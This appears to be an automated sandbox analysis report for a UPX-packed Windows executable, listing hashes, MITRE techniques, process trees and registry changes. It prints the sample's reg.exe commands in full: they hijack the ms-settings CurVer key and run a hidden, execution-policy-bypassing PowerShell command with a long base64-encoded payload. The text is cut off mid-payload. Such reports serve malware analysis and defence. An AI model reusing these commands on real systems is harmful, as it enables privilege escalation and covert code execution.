e0db37b6df269163676caf35a629e7bfabe8400703967f9ddc6c3111d99e7775

General

Target

5ffc3d634e8989b4a9c27615117afa9d.exe
Size

59KB
MD5

5ffc3d634e8989b4a9c27615117afa9d
SHA1

95f0e2a408013d994448e8f8b552fb1494238d3d
SHA256

e0db37b6df269163676caf35a629e7bfabe8400703967f9ddc6c3111d99e7775
SHA512

93e06b951ed9227314e4f92c2e624a63289958f3bc23b8846a50d5a20d96ef7d6632ba0a22ab6fdd1c30071e741976d4e7158cd533567313cb1111f4bc25298d
SSDEEP

768:mNI41sOvvE1fFfjvbfLEjTspixL61BZ/J7iSD4B25fgOv14pQjvSMng24gnI1c:mKKsOHE1NDEjY5716BKfl4poSMnEx1c

Score

8^/10

upx

Malware Config

Signatures

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1936-57-0x0000000140000000-0x0000000140027000-memory.dmp	upx
behavioral1/memory/1936-69-0x0000000140000000-0x0000000140027000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 14 IoCs

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\ms-settings	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\.omg	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\.omg\Shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\.omg\Shell\Open\command\ = "powershell.exe -w h -NoP -NonI -Exec Bypass -enc IABJAG4AdgBvAGsAZQAtAEUAeABQAFIARQBTAFMASQBvAG4AIAAoACgAIABuAEUAdwAtAE8AYgBKAGUAYwBUACAAIABtAGEAbgBhAEcARQBNAGUATgBUAC4AQQBVAFQATwBtAEEAdABJAG8AbgAuAFAAcwBDAHIAZQBkAEUAbgBUAGkAQQBMACAAJwAgACcALAAoACcANwA2ADQAOQAyAGQAMQAxADEANgA3ADQAMwBmADAANAAyADMANAAxADMAYgAxADYAMAA1ADAAYQA1ADMANAA1AE0AZwBCADgAQQBIAGsAQQBSAGcAQgBxAEEARgBnAEEAWQBRAEIAeQBBAEQAawBBAE8AQQBCADAAQQBIAGsAQQBhAEEAQQA0AEEARwBnAEEAZABnAEIAVgBBAEYAbwBBAFYAQQBCADUAQQBFAFEAQQBOAEEAQgBvAEEARwBjAEEAUABRAEEAOQBBAEgAdwBBAE8AQQBCAG0AQQBEAEkAQQBaAFEAQgBsAEEARABRAEEAWQB3AEIAawBBAEQAZwBBAE0AdwBCAGkAQQBHAEUAQQBZAGcAQgBrAEEARwBZAEEAWQB3AEIAagBBAEcAUQBBAE4AdwBCAGsAQQBEAGsAQQBOAHcAQgBqAEEARABrAEEAWgBnAEIAaQBBAEQAVQBBAE4AZwBBADUAQQBEAEUAQQBaAEEAQgBsAEEARABJAEEATQBnAEEAdwBBAEQAZwBBAE4AQQBBADUAQQBEAFEAQQBaAGcAQQA1AEEARwBFAEEATQB3AEIAbQBBAEcASQBBAE0AQQBBADEAQQBEAGsAQQBZAFEAQgBoAEEARABVAEEATwBBAEEAegBBAEcAWQBBAE4AZwBBAHoAQQBEAFEAQQBaAFEAQQB3AEEARABrAEEAWQBnAEEAegBBAEcARQBBAFoAZwBBADMAQQBHAEUAQQBOAEEAQgBqAEEARABjAEEATgBRAEEAdwBBAEQAVQBBAE4AQQBBADEAQQBEAFkAQQBZAHcAQgBpAEEARwBZAEEATwBBAEIAbQBBAEQAZwBBAE0AUQBCAGgAQQBEAEUAQQBNAHcAQQA0AEEARwBZAEEATwBRAEIAagBBAEcAUQBBAE4AdwBCAGoAQQBHAEUAQQBZAGcAQQA0AEEARABJAEEAWgBRAEEAMwBBAEcATQBBAE4AZwBBADUAQQBEAGcAQQBPAEEAQgBqAEEARABZAEEATQBBAEIAaQBBAEQASQBBAFkAZwBBAHoAQQBEAFUAQQBaAEEAQgBqAEEARwBRAEEATQBRAEEAMABBAEcASQBBAE0AZwBBAHcAQQBEAGsAQQBZAHcAQQAwAEEARwBFAEEATgB3AEIAbABBAEQATQBBAFoAUQBBADUAQQBHAEkAQQBZAHcAQQAyAEEARwBRAEEATgBRAEEAeABBAEQAawBBAE0AZwBBADQAQQBHAFEAQQBaAGcAQgBtAEEARABFAEEATQB3AEEAMgBBAEQAawBBAFkAZwBBADIAQQBHAFEAQQBOAHcAQQAxAEEARABNAEEATQBnAEEANABBAEQAUQBBAE4AZwBBAHcAQQBHAFUAQQBZAFEAQQAyAEEARABFAEEATQBBAEEANABBAEcARQBBAE0AZwBCAG0AQQBHAE0AQQBNAEEAQQAyAEEARABZAEEAWQBRAEEAMwBBAEQAawBBAE0AQQBBAHkAQQBHAE0AQQBNAHcAQgBpAEEARwBFAEEAWQB3AEIAbABBAEQARQBBAE4AZwBBAHgAQQBHAFUAQQBZAFEAQQA1AEEARABZAEEATQBnAEEAeABBAEQAawBBAE4AUQBBADUAQQBEAEEAQQBNAGcAQQAwAEEARwBFAEEATgBnAEEAeABBAEQAWQBBAE0AdwBBAHkAQQBEAFkAQQBOAFEAQQAzAEEARABNAEEATwBBAEIAbQBBAEQAawBBAFkAdwBCAGgAQQBHAFUAQQBOAGcAQQAzAEEARABBAEEATwBBAEEANABBAEcARQBBAE0AQQBCAGkAQQBEAEUAQQBNAEEAQgBpAEEARwBFAEEATQBRAEIAawBBAEcATQBBAFkAUQBCAG0AQQBEAEEAQQBNAEEAQQB3AEEARABJAEEATQBBAEEAMwBBAEQAVQBBAFkAZwBBADQAQQBHAFUAQQBNAFEAQgBrAEEARABNAEEAWQBRAEEANQBBAEQAWQBBAE0AUQBCAGoAQQBHAFEAQQBZAFEAQQA1AEEARwBZAEEATQBnAEEAdwBBAEcATQBBAE0AQQBCAGsAQQBHAEkAQQBOAGcAQQB6AEEARABBAEEATQB3AEEANABBAEQAQQBBAFkAZwBBADUAQQBEAEUAQQBOAFEAQgBrAEEARABFAEEAWQBRAEEAMgBBAEcARQBBAE4AQQBBADIAQQBEAGMAQQBOAGcAQQB4AEEARABrAEEATgB3AEIAaABBAEcAUQBBAE0AQQBBADMAQQBHAFEAQQBNAGcAQQB6AEEARwBNAEEATQBnAEEANQBBAEcAWQBBAE0AdwBCAGwAQQBEAEUAQQBPAEEAQQB4AEEARABnAEEATQBRAEIAawBBAEQAawBBAE0AUQBCAG0AQQBEAFkAQQBNAGcAQQAyAEEARABnAEEAWgBRAEEANQBBAEQARQBBAE0AQQBBAHcAQQBEAEUAQQBPAEEAQQAwAEEARABBAEEATQBBAEEANABBAEQATQBBAE0AQQBBAHgAQQBHAFUAQQBNAFEAQQB4AEEARwBNAEEATwBBAEIAaABBAEQASQBBAE0AUQBCAGsAQQBEAEUAQQBOAHcAQgBtAEEARwBRAEEATgBBAEEAMgBBAEQAYwBBAE8AUQBBAHkAQQBEAFEAQQBaAGcAQQB6AEEARwBNAEEAWQBRAEIAagBBAEQAWQBBAFkAdwBBADQAQQBEAEEAQQBNAEEAQQAyAEEARwBNAEEATQBRAEIAaABBAEcARQBBAE8AQQBCAGoAQQBHAFkAQQBNAGcAQgBqAEEARwBFAEEATQBnAEIAagBBAEcARQBBAE0AdwBBAHoAQQBEAFkAQQBOAFEAQgBqAEEARABjAEEAWgBBAEIAaABBAEQAWQBBAFkAUQBCAGoAQQBHAFEAQQBOAFEAQQB6AEEARABnAEEATQBnAEIAawBBAEQASQBBAE8AUQBBADMAQQBEAFkAQQBOAFEAQQAxAEEARABZAEEATgBBAEEAMgBBAEcAVQBBAE0AdwBCAG0AQQBEAFUAQQBZAGcAQgBpAEEARwBVAEEATgBBAEIAaABBAEQASQBBAE0AZwBBADEAQQBEAGsAQQBOAEEAQQB3AEEARwBRAEEAWgBnAEIAagBBAEQARQBBAFoAQQBBADAAQQBHAEkAQQBOAHcAQgBsAEEARABjAEEATQBnAEIAbABBAEQAUQBBAE0AZwBCAGoAQQBEAEEAQQBPAEEAQQAyAEEARABFAEEATgBnAEEANQBBAEcAWQBBAFkAZwBBADIAQQBEAEUAQQBOAEEAQQB3AEEARABVAEEATgBRAEEAMgBBAEQARQBBAFkAUQBCAGsAQQBHAFUAQQBaAGcAQgBsAEEARwBJAEEATgBRAEIAaABBAEQASQBBAE0AZwBCAGkAQQBHAFEAQQBZAHcAQQAyAEEARwBJAEEAWQBnAEEAegBBAEQAawBBAE0AZwBBADUAQQBHAFUAQQBaAEEAQQB4AEEARABrAEEATQB3AEEAeABBAEQAQQBBAFoAZwBBAHkAQQBHAFEAQQBNAFEAQQAwAEEARwBFAEEATwBBAEIAbQBBAEcARQBBAFoAQQBBADQAQQBEAEUAQQBaAFEAQQB5AEEARABJAEEATgBRAEIAaABBAEQAWQBBAE0AdwBBADMAQQBEAGMAQQBPAFEAQQA1AEEARwBVAEEATwBRAEEAMwBBAEcASQBBAFoAZwBCAGkAQQBEAFkAQQBNAHcAQQA0AEEARABNAEEATgBnAEEAdwBBAEQAUQBBAFkAdwBBAHcAQQBHAEUAQQBNAFEAQQB4AEEARABBAEEATQB3AEEAeQBBAEQAUQBBAE0AdwBCAGkAQQBHAE0AQQBOAHcAQgBtAEEARwBFAEEATwBBAEIAaQBBAEQAUQBBAFoAUQBCAGwAQQBHAEUAQQBOAEEAQQAwAEEARABBAEEAWQB3AEIAawBBAEcAUQBBAE4AQQBBAHoAQQBHAEkAQQBNAGcAQQB5AEEARwBNAEEATwBRAEEAeABBAEQASQBBAE8AUQBBADEAQQBEAFEAQQBOAEEAQgBrAEEARwBRAEEATgBRAEIAaABBAEcATQBBAFoAUQBBADAAQQBHAEkAQQBNAHcAQQB6AEEARABrAEEATQB3AEEAeABBAEQAVQBBAFoAQQBBADUAQQBHAFkAQQBOAFEAQgBpAEEARABjAEEATQBnAEIAawBBAEQAWQBBAE0AdwBBADEAQQBHAFUAQQBZAGcAQQB5AEEARABrAEEATQBBAEIAagBBAEcARQBBAE0AdwBCAGoAQQBHAEUAQQBNAHcAQQAzAEEARABrAEEATgBBAEEAegBBAEcATQBBAFoAUQBBAHgAQQBEAFUAQQBOAHcAQgBtAEEARABFAEEATQBnAEEAdwBBAEcAUQBBAFkAdwBCAGkAQQBEAFUAQQBPAFEAQQB5AEEARABjAEEATQBBAEEAMABBAEQAawBBAE4AUQBBAHgAQQBHAE0AQQBZAHcAQQB4AEEARwBVAEEAWQBRAEIAawBBAEQASQBBAE4AUQBBADUAQQBEAGsAQQBaAEEAQgBoAEEARABFAEEATQBnAEEAMQBBAEcATQBBAE4AdwBCAGoAQQBEAGsAQQBOAEEAQQAwAEEARwBZAEEAWgBnAEIAawBBAEQAQQBBAFkAZwBCAGoAQQBEAFUAQQBOAHcAQgBtAEEARABJAEEATQBnAEIAagBBAEQAQQBBAE8AQQBBADUAQQBEAFEAQQBPAEEAQQAwAEEARwBRAEEATQBRAEEANQBBAEQAUQBBAFkAdwBBADIAQQBEAEEAQQBaAEEAQQB4AEEARwBVAEEATQBnAEIAaABBAEQAYwBBAE0AZwBBADIAQQBEAEUAQQBOAGcAQgBrAEEARwBRAEEATQBnAEEANQBBAEQASQBBAE8AUQBCAGwAQQBHAFUAQQBZAFEAQgBsAEEARwBJAEEAWgBnAEEAMwBBAEQAUQBBAFoAQQBBADUAQQBEAEUAQQBNAGcAQQB4AEEARwBFAEEAWgBBAEIAbQBBAEQAWQBBAFkAUQBBADMAQQBEAEkAQQBPAFEAQQA0AEEARABnAEEAWgBnAEEAMQBBAEcAUQBBAE4AUQBBAHcAQQBEAFUAQQBZAFEAQgBqAEEARABVAEEATQBRAEEANABBAEcARQBBAFkAUQBBADEAQQBEAGMAQQBZAGcAQQAyAEEARABBAEEATgBBAEIAbQBBAEQAYwBBAE4AUQBBADUAQQBEAGMAQQBNAGcAQgBpAEEARwBRAEEAWgBBAEIAbQBBAEQAVQBBAE0AdwBBADQAQQBEAEUAQQBOAFEAQQB6AEEARwBVAEEATQBnAEEAMQBBAEQAQQBBAE4AQQBBADMAQQBHAEkAQQBNAHcAQQB4AEEARABFAEEAWQBRAEEAdwBBAEcAVQBBAE4AZwBBADEAQQBEAGMAQQBNAHcAQgBsAEEARwBRAEEATgB3AEEAdwBBAEcASQBBAE4AZwBBADMAQQBEAEUAQQBNAEEAQQA0AEEARABZAEEAWgBRAEEAegBBAEQATQBBAFkAdwBBADUAQQBEAGMAQQBZAHcAQgBqAEEARABjAEEATgB3AEEAMQBBAEQAWQBBAFoAZwBBAHgAQQBEAGcAQQBaAEEAQgBsAEEARABVAEEATgBRAEEAdwBBAEQAawBBAFkAZwBBADMAQQBEAGcAQQBOAHcAQgBoAEEARABjAEEATQBRAEEAeABBAEQARQBBAE0AUQBBAHkAQQBEAGsAQQBOAEEAQgBtAEEARABJAEEATgB3AEEANQBBAEQASQBBAE8AQQBBAHgAQQBEAE0AQQBZAFEAQQAxAEEARABjAEEATgBnAEIAawBBAEcASQBBAE0AZwBBADIAQQBHAFUAQQBNAHcAQQB4AEEARwBZAEEAWQBRAEEANABBAEEAPQA9ACcAIAB8AGMAbwBOAFYARQByAFQAVABvAC0AUwBFAEMAVQBSAGUAcwB0AFIAaQBOAEcAIAAtAEsAIAAzACwAMQA4ADMALAAzADAALAAyADQAMgAsADQANgAsADUANAAsADEAMQAwACwANgAsADEANgA5ACwANwAxACwAOAA4ACwAMQA4ADIALAA5ADUALAAxADkAMwAsADEAMAA4ACwAMgAxADcALAA3ADUALAAyADIAMwAsADIANQAzACwANgAyACwAMgAxADUALAA4ADkALAAyADUAMwAsADIAMgA5ACkAIAApAC4ARwBFAFQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgBUAGkAYQBsACgAKQAuAFAAYQBTAHMAdwBPAFIAZAApACAA "	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\.omg\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\ms-settings\CurVer	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\.omg\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\.omg	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\ms-settings\CurVer\ = ".omg"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\.omg\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\.omg\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\ms-settings\CurVer	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\.omg\Shell\Open\command	reg.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exe

pid process

1804 reg.exe
836 reg.exe
1844 reg.exe
840 reg.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

364 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 364 powershell.exe

pid	process
1804	reg.exe
836	reg.exe
1844	reg.exe
840	reg.exe

pid	process
364	powershell.exe

description	pid	process
Token: SeDebugPrivilege	364	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

5ffc3d634e8989b4a9c27615117afa9d.exepowershell.exe

description	pid	process	target process
PID 1936 wrote to memory of 364	1936	5ffc3d634e8989b4a9c27615117afa9d.exe	powershell.exe
PID 1936 wrote to memory of 364	1936	5ffc3d634e8989b4a9c27615117afa9d.exe	powershell.exe
PID 1936 wrote to memory of 364	1936	5ffc3d634e8989b4a9c27615117afa9d.exe	powershell.exe
PID 364 wrote to memory of 1804	364	powershell.exe	reg.exe
PID 364 wrote to memory of 1804	364	powershell.exe	reg.exe
PID 364 wrote to memory of 1804	364	powershell.exe	reg.exe
PID 364 wrote to memory of 836	364	powershell.exe	reg.exe
PID 364 wrote to memory of 836	364	powershell.exe	reg.exe
PID 364 wrote to memory of 836	364	powershell.exe	reg.exe
PID 364 wrote to memory of 1844	364	powershell.exe	reg.exe
PID 364 wrote to memory of 1844	364	powershell.exe	reg.exe
PID 364 wrote to memory of 1844	364	powershell.exe	reg.exe
PID 364 wrote to memory of 840	364	powershell.exe	reg.exe
PID 364 wrote to memory of 840	364	powershell.exe	reg.exe
PID 364 wrote to memory of 840	364	powershell.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\5ffc3d634e8989b4a9c27615117afa9d.exe
"C:\Users\Admin\AppData\Local\Temp\5ffc3d634e8989b4a9c27615117afa9d.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" –NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\F93E.tmp\F93F.tmp\F940.ps1
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:364

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d "powershell.exe -w h -NoP -NonI -Exec Bypass -enc IABJAG4AdgBvAGsAZQAtAEUAeABQAFIARQBTAFMASQBvAG4AIAAoACgAIABuAEUAdwAtAE8AYgBKAGUAYwBUACAAIABtAGEAbgBhAEcARQBNAGUATgBUAC4AQQBVAFQATwBtAEEAdABJAG8AbgAuAFAAcwBDAHIAZQBkAEUAbgBUAGkAQQBMACAAJwAgACcALAAoACcANwA2ADQAOQAyAGQAMQAxADEANgA3ADQAMwBmADAANAAyADMANAAxADMAYgAxADYAMAA1ADAAYQA1ADMANAA1AE0AZwBCADgAQQBIAGsAQQBSAGcAQgBxAEEARgBnAEEAWQBRAEIAeQBBAEQAawBBAE8AQQBCADAAQQBIAGsAQQBhAEEAQQA0AEEARwBnAEEAZABnAEIAVgBBAEYAbwBBAFYAQQBCADUAQQBFAFEAQQBOAEEAQgBvAEEARwBjAEEAUABRAEEAOQBBAEgAdwBBAE8AQQBCAG0AQQBEAEkAQQBaAFEAQgBsAEEARABRAEEAWQB3AEIAawBBAEQAZwBBAE0AdwBCAGkAQQBHAEUAQQBZAGcAQgBrAEEARwBZAEEAWQB3AEIAagBBAEcAUQBBAE4AdwBCAGsAQQBEAGsAQQBOAHcAQgBqAEEARABrAEEAWgBnAEIAaQBBAEQAVQBBAE4AZwBBADUAQQBEAEUAQQBaAEEAQgBsAEEARABJAEEATQBnAEEAdwBBAEQAZwBBAE4AQQBBADUAQQBEAFEAQQBaAGcAQQA1AEEARwBFAEEATQB3AEIAbQBBAEcASQBBAE0AQQBBADEAQQBEAGsAQQBZAFEAQgBoAEEARABVAEEATwBBAEEAegBBAEcAWQBBAE4AZwBBAHoAQQBEAFEAQQBaAFEAQQB3AEEARABrAEEAWQBnAEEAegBBAEcARQBBAFoAZwBBADMAQQBHAEUAQQBOAEEAQgBqAEEARABjAEEATgBRAEEAdwBBAEQAVQBBAE4AQQBBADEAQQBEAFkAQQBZAHcAQgBpAEEARwBZAEEATwBBAEIAbQBBAEQAZwBBAE0AUQBCAGgAQQBEAEUAQQBNAHcAQQA0AEEARwBZAEEATwBRAEIAagBBAEcAUQBBAE4AdwBCAGoAQQBHAEUAQQBZAGcAQQA0AEEARABJAEEAWgBRAEEAMwBBAEcATQBBAE4AZwBBADUAQQBEAGcAQQBPAEEAQgBqAEEARABZAEEATQBBAEIAaQBBAEQASQBBAFkAZwBBAHoAQQBEAFUAQQBaAEEAQgBqAEEARwBRAEEATQBRAEEAMABBAEcASQBBAE0AZwBBAHcAQQBEAGsAQQBZAHcAQQAwAEEARwBFAEEATgB3AEIAbABBAEQATQBBAFoAUQBBADUAQQBHAEkAQQBZAHcAQQAyAEEARwBRAEEATgBRAEEAeABBAEQAawBBAE0AZwBBADQAQQBHAFEAQQBaAGcAQgBtAEEARABFAEEATQB3AEEAMgBBAEQAawBBAFkAZwBBADIAQQBHAFEAQQBOAHcAQQAxAEEARABNAEEATQBnAEEANABBAEQAUQBBAE4AZwBBAHcAQQBHAFUAQQBZAFEAQQAyAEEARABFAEEATQBBAEEANABBAEcARQBBAE0AZwBCAG0AQQBHAE0AQQBNAEEAQQAyAEEARABZAEEAWQBRAEEAMwBBAEQAawBBAE0AQQBBAHkAQQBHAE0AQQBNAHcAQgBpAEEARwBFAEEAWQB3AEIAbABBAEQARQBBAE4AZwBBAHgAQQBHAFUAQQBZAFEAQQA1AEEARABZAEEATQBnAEEAeABBAEQAawBBAE4AUQBBADUAQQBEAEEAQQBNAGcAQQAwAEEARwBFAEEATgBnAEEAeABBAEQAWQBBAE0AdwBBAHkAQQBEAFkAQQBOAFEAQQAzAEEARABNAEEATwBBAEIAbQBBAEQAawBBAFkAdwBCAGgAQQBHAFUAQQBOAGcAQQAzAEEARABBAEEATwBBAEEANABBAEcARQBBAE0AQQBCAGkAQQBEAEUAQQBNAEEAQgBpAEEARwBFAEEATQBRAEIAawBBAEcATQBBAFkAUQBCAG0AQQBEAEEAQQBNAEEAQQB3AEEARABJAEEATQBBAEEAMwBBAEQAVQBBAFkAZwBBADQAQQBHAFUAQQBNAFEAQgBrAEEARABNAEEAWQBRAEEANQBBAEQAWQBBAE0AUQBCAGoAQQBHAFEAQQBZAFEAQQA1AEEARwBZAEEATQBnAEEAdwBBAEcATQBBAE0AQQBCAGsAQQBHAEkAQQBOAGcAQQB6AEEARABBAEEATQB3AEEANABBAEQAQQBBAFkAZwBBADUAQQBEAEUAQQBOAFEAQgBrAEEARABFAEEAWQBRAEEAMgBBAEcARQBBAE4AQQBBADIAQQBEAGMAQQBOAGcAQQB4AEEARABrAEEATgB3AEIAaABBAEcAUQBBAE0AQQBBADMAQQBHAFEAQQBNAGcAQQB6AEEARwBNAEEATQBnAEEANQBBAEcAWQBBAE0AdwBCAGwAQQBEAEUAQQBPAEEAQQB4AEEARABnAEEATQBRAEIAawBBAEQAawBBAE0AUQBCAG0AQQBEAFkAQQBNAGcAQQAyAEEARABnAEEAWgBRAEEANQBBAEQARQBBAE0AQQBBAHcAQQBEAEUAQQBPAEEAQQAwAEEARABBAEEATQBBAEEANABBAEQATQBBAE0AQQBBAHgAQQBHAFUAQQBNAFEAQQB4AEEARwBNAEEATwBBAEIAaABBAEQASQBBAE0AUQBCAGsAQQBEAEUAQQBOAHcAQgBtAEEARwBRAEEATgBBAEEAMgBBAEQAYwBBAE8AUQBBAHkAQQBEAFEAQQBaAGcAQQB6AEEARwBNAEEAWQBRAEIAagBBAEQAWQBBAFkAdwBBADQAQQBEAEEAQQBNAEEAQQAyAEEARwBNAEEATQBRAEIAaABBAEcARQBBAE8AQQBCAGoAQQBHAFkAQQBNAGcAQgBqAEEARwBFAEEATQBnAEIAagBBAEcARQBBAE0AdwBBAHoAQQBEAFkAQQBOAFEAQgBqAEEARABjAEEAWgBBAEIAaABBAEQAWQBBAFkAUQBCAGoAQQBHAFEAQQBOAFEAQQB6AEEARABnAEEATQBnAEIAawBBAEQASQBBAE8AUQBBADMAQQBEAFkAQQBOAFEAQQAxAEEARABZAEEATgBBAEEAMgBBAEcAVQBBAE0AdwBCAG0AQQBEAFUAQQBZAGcAQgBpAEEARwBVAEEATgBBAEIAaABBAEQASQBBAE0AZwBBADEAQQBEAGsAQQBOAEEAQQB3AEEARwBRAEEAWgBnAEIAagBBAEQARQBBAFoAQQBBADAAQQBHAEkAQQBOAHcAQgBsAEEARABjAEEATQBnAEIAbABBAEQAUQBBAE0AZwBCAGoAQQBEAEEAQQBPAEEAQQAyAEEARABFAEEATgBnAEEANQBBAEcAWQBBAFkAZwBBADIAQQBEAEUAQQBOAEEAQQB3AEEARABVAEEATgBRAEEAMgBBAEQARQBBAFkAUQBCAGsAQQBHAFUAQQBaAGcAQgBsAEEARwBJAEEATgBRAEIAaABBAEQASQBBAE0AZwBCAGkAQQBHAFEAQQBZAHcAQQAyAEEARwBJAEEAWQBnAEEAegBBAEQAawBBAE0AZwBBADUAQQBHAFUAQQBaAEEAQQB4AEEARABrAEEATQB3AEEAeABBAEQAQQBBAFoAZwBBAHkAQQBHAFEAQQBNAFEAQQAwAEEARwBFAEEATwBBAEIAbQBBAEcARQBBAFoAQQBBADQAQQBEAEUAQQBaAFEAQQB5AEEARABJAEEATgBRAEIAaABBAEQAWQBBAE0AdwBBADMAQQBEAGMAQQBPAFEAQQA1AEEARwBVAEEATwBRAEEAMwBBAEcASQBBAFoAZwBCAGkAQQBEAFkAQQBNAHcAQQA0AEEARABNAEEATgBnAEEAdwBBAEQAUQBBAFkAdwBBAHcAQQBHAEUAQQBNAFEAQQB4AEEARABBAEEATQB3AEEAeQBBAEQAUQBBAE0AdwBCAGkAQQBHAE0AQQBOAHcAQgBtAEEARwBFAEEATwBBAEIAaQBBAEQAUQBBAFoAUQBCAGwAQQBHAEUAQQBOAEEAQQAwAEEARABBAEEAWQB3AEIAawBBAEcAUQBBAE4AQQBBAHoAQQBHAEkAQQBNAGcAQQB5AEEARwBNAEEATwBRAEEAeABBAEQASQBBAE8AUQBBADEAQQBEAFEAQQBOAEEAQgBrAEEARwBRAEEATgBRAEIAaABBAEcATQBBAFoAUQBBADAAQQBHAEkAQQBNAHcAQQB6AEEARABrAEEATQB3AEEAeABBAEQAVQBBAFoAQQBBADUAQQBHAFkAQQBOAFEAQgBpAEEARABjAEEATQBnAEIAawBBAEQAWQBBAE0AdwBBADEAQQBHAFUAQQBZAGcAQQB5AEEARABrAEEATQBBAEIAagBBAEcARQBBAE0AdwBCAGoAQQBHAEUAQQBNAHcAQQAzAEEARABrAEEATgBBAEEAegBBAEcATQBBAFoAUQBBAHgAQQBEAFUAQQBOAHcAQgBtAEEARABFAEEATQBnAEEAdwBBAEcAUQBBAFkAdwBCAGkAQQBEAFUAQQBPAFEAQQB5AEEARABjAEEATQBBAEEAMABBAEQAawBBAE4AUQBBAHgAQQBHAE0AQQBZAHcAQQB4AEEARwBVAEEAWQBRAEIAawBBAEQASQBBAE4AUQBBADUAQQBEAGsAQQBaAEEAQgBoAEEARABFAEEATQBnAEEAMQBBAEcATQBBAE4AdwBCAGoAQQBEAGsAQQBOAEEAQQAwAEEARwBZAEEAWgBnAEIAawBBAEQAQQBBAFkAZwBCAGoAQQBEAFUAQQBOAHcAQgBtAEEARABJAEEATQBnAEIAagBBAEQAQQBBAE8AQQBBADUAQQBEAFEAQQBPAEEAQQAwAEEARwBRAEEATQBRAEEANQBBAEQAUQBBAFkAdwBBADIAQQBEAEEAQQBaAEEAQQB4AEEARwBVAEEATQBnAEIAaABBAEQAYwBBAE0AZwBBADIAQQBEAEUAQQBOAGcAQgBrAEEARwBRAEEATQBnAEEANQBBAEQASQBBAE8AUQBCAGwAQQBHAFUAQQBZAFEAQgBsAEEARwBJAEEAWgBnAEEAMwBBAEQAUQBBAFoAQQBBADUAQQBEAEUAQQBNAGcAQQB4AEEARwBFAEEAWgBBAEIAbQBBAEQAWQBBAFkAUQBBADMAQQBEAEkAQQBPAFEAQQA0AEEARABnAEEAWgBnAEEAMQBBAEcAUQBBAE4AUQBBAHcAQQBEAFUAQQBZAFEAQgBqAEEARABVAEEATQBRAEEANABBAEcARQBBAFkAUQBBADEAQQBEAGMAQQBZAGcAQQAyAEEARABBAEEATgBBAEIAbQBBAEQAYwBBAE4AUQBBADUAQQBEAGMAQQBNAGcAQgBpAEEARwBRAEEAWgBBAEIAbQBBAEQAVQBBAE0AdwBBADQAQQBEAEUAQQBOAFEAQQB6AEEARwBVAEEATQBnAEEAMQBBAEQAQQBBAE4AQQBBADMAQQBHAEkAQQBNAHcAQQB4AEEARABFAEEAWQBRAEEAdwBBAEcAVQBBAE4AZwBBADEAQQBEAGMAQQBNAHcAQgBsAEEARwBRAEEATgB3AEEAdwBBAEcASQBBAE4AZwBBADMAQQBEAEUAQQBNAEEAQQA0AEEARABZAEEAWgBRAEEAegBBAEQATQBBAFkAdwBBADUAQQBEAGMAQQBZAHcAQgBqAEEARABjAEEATgB3AEEAMQBBAEQAWQBBAFoAZwBBAHgAQQBEAGcAQQBaAEEAQgBsAEEARABVAEEATgBRAEEAdwBBAEQAawBBAFkAZwBBADMAQQBEAGcAQQBOAHcAQgBoAEEARABjAEEATQBRAEEAeABBAEQARQBBAE0AUQBBAHkAQQBEAGsAQQBOAEEAQgBtAEEARABJAEEATgB3AEEANQBBAEQASQBBAE8AQQBBAHgAQQBEAE0AQQBZAFEAQQAxAEEARABjAEEATgBnAEIAawBBAEcASQBBAE0AZwBBADIAQQBHAFUAQQBNAHcAQQB4AEEARwBZAEEAWQBRAEEANABBAEEAPQA9ACcAIAB8AGMAbwBOAFYARQByAFQAVABvAC0AUwBFAEMAVQBSAGUAcwB0AFIAaQBOAEcAIAAtAEsAIAAzACwAMQA4ADMALAAzADAALAAyADQAMgAsADQANgAsADUANAAsADEAMQAwACwANgAsADEANgA5ACwANwAxACwAOAA4ACwAMQA4ADIALAA5ADUALAAxADkAMwAsADEAMAA4ACwAMgAxADcALAA3ADUALAAyADIAMwAsADIANQAzACwANgAyACwAM